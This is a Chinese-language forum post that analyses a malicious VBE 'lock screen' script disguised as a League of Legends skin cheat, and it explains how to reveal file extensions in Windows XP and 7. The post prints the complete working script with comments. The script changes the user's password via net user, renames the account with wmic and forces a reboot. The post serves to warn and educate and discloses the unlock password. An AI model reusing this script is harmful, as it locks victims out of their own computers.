关于电脑恶意锁机脚本的分析

bete68.com

感谢博路发论坛对本人原创文章的邀请，今天的文章是针对论坛有些朋友下载一个叫英雄联盟皮肤作弊器的脚本文件，出现了被恶意锁机的现象。
下载此类文件，首先要看文件的后缀，
默认设置下，打开电脑里面的文件都是隐藏文件扩展名的，
1.XP系统显示文件后缀名的方法

　　如何显示文件后缀名的操作步骤：
　　1.打开“我的电脑”，在最上面一栏的菜单栏中找到“工具”——“文件夹选项”

2.弹出“文件夹选项”对话框，切换到“查看”选项卡，不勾选“隐藏已知文件类型的扩展名”，确定。这样就可以显示文件后缀名了。


2. WIN7系统显示文件后缀名的方法

　　执行“计算机（我的电脑）→组织→文件夹和搜索选项→查看→隐藏已知文件扩展名”



exe后缀属于二进制的可执行程序，也就是说双击直接可以运行，
js文件属于javascript脚本属于网页文件，
vbs属于脚本文件是VisualBasicScript的简称,有时也被缩写为vbs。VBScript是微软开发的一种脚本语言，这种脚本属于vb高级语言的简化版
vbe跟VBS差不多,都是VB脚本代码文件,
今天所分析的就是vbe文件后缀的，这种后缀的文件直接可以使用文本打开或者把后缀改成txt，然后打开就ok了
以下是文件内容：
On Error Resume Next '这句是脚本容错语句


Dim fso,ws,file,shut,password '定义五个变量


password="www.bete68.com" '给变量赋值，博路发提醒你通过password这个变量的英文含义大体就能知道这就是开锁密码了


Set fso=Wscript.CreateObject("Scripting.FileSystemObject") '定义一个FSO 的对象用于操作磁盘、文件夹或文本文件。


Set ws=Wscript.CreateObject("Wscript.Shell") '创建WScript.Shell对象ws，然后使用这个对象的一些属性来操作文件


fol=fso.GetSpecialFolder(1) '利用fso对象的GetSpecialFolder方法返回指定的特殊文件夹，1就是系统文件夹


file=fol & "\net.exe" '将系统文件夹下的net.exe文件赋值给变量file


shut=fol & "\shutdown.exe" ''将系统文件夹下的shutdown.exe文件赋值给变量shut


ws.run file & " user %UserName% "+Chr(34) & password & Chr(34),0,True'利用ws对象run方法运行系统文件夹的net.exe来修改系统登录密码为www.bete68.com


ws.Run "wmic.exe useraccount where name='%username%' call Rename ""请访问博路发"+Chr(34),0,True'利用ws对象的run方法来运行系统里的wmic.exe文件来对帐号改名，名字就是“请访问博路发“


ws.run shut & " /r /f /t 0",0  '利用ws对象的run方法执行shut 也就是重启



好了，文章就写到这里了，最后希望论坛越做越好，希望本文章对大家能有所帮助。
                                                                                                                                
                                                                                                                  安